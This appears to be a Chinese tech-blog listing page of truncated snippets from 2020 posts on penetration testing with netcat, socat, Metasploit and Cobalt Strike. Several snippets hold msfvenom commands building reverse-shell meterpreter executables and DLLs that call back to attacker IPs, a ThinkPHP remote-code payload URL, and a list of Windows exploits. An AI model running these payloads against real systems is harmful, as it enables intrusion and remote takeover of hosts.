目录 "1.使用netcat获取主机操作Shell,cron启动" "2.使用socat获取主机操作Shell, 任务计划启动" "3.使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell" "4.使用MSF meterprete ...
分类:
其他好文 时间:
2020-03-15 18:58:08
阅读次数:
184
1、msf创建监听 msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterp ...
分类:
Web程序 时间:
2020-03-06 11:14:11
阅读次数:
110
Msfconsole中set payload命令最新改进为了方便用户的输入,Msfconsole改进了set payload命令的输入。在执行set payload命令时,可以使用三种前缀,分别是/payload、payload、和/。或者,不使用任何前缀,直接指定攻击载荷路径即可。其中,可以执行的 ...
分类:
其他好文 时间:
2020-02-26 20:55:57
阅读次数:
98
被控端生成:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.5.139 LPORT=2345 -f exe > /root/yangtest.exe msf配置如下当被控端运行后即可上线:msf5 > use exploit/mul ...
分类:
其他好文 时间:
2020-02-23 14:34:30
阅读次数:
295
https://www.cnblogs.com/test404/p/10599981.html + msf 派生 shell 给 Cobalt strike(前提有一个meterpreter) + Cobalt strike 派生 shell 给 MSF(前提有个beaconshell) 之后使用C ...
分类:
Web程序 时间:
2020-02-23 11:18:48
阅读次数:
90
第一步:生成dll文件 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.106.10 LPORT=443 -f dll -o /tmp/reverse_tcp.dll 第二步:启动MSF等待回连 use exploit/mu ...
分类:
系统相关 时间:
2020-02-16 16:13:17
阅读次数:
132
前言 使用Exp生成器生成Ladon插件实战,CVE 2016 3088 ActiveMQ GetShell 0x000 漏洞信息 漏洞编号: CVE 2016 3088 漏洞原理: ActiveMQ 中的 FileServer 服务允许用户通过 PUT/MOVE方法上传文件到指定目录 影响版本: ...
分类:
系统相关 时间:
2020-02-14 16:23:43
阅读次数:
140
前言 使用Exp生成器生成Ladon插件实战,ThinkPHP GetShell 漏洞环境 使用docker ThinkPHP 5.0.20 复现测试 Payload: http://192.168.1.37:8080/index.php?s=/Index/\think\app/invokefunc ...
分类:
Web程序 时间:
2020-02-14 16:22:50
阅读次数:
108
0x01 简介 Hershell 是一款 go 语言编写的多平台反向 shell 生成器,使用 tls 加密流量,并提供证书公钥指纹固定功能,防止流量拦截。 0x02 安装及配置 因为是第一次接触go,相应不同环境请自行摸索: Linux: 0x03 操作使用 1.生成证书 以 windows 为例 ...
分类:
系统相关 时间:
2020-01-28 15:55:27
阅读次数:
136
windows 系统漏洞,ms系列 ms08 067 ms09 012 pr.exe/巴西烤肉提权 ms09 020 iis5/6 ms12 020 rdp蓝屏 ms17 010 永恒之蓝/wannacry cve 2019 0708 rdp/命令执行 粘滞键提权(sethc.exe) 使用cmd. ...
分类:
其他好文 时间:
2020-01-23 09:25:45
阅读次数:
83
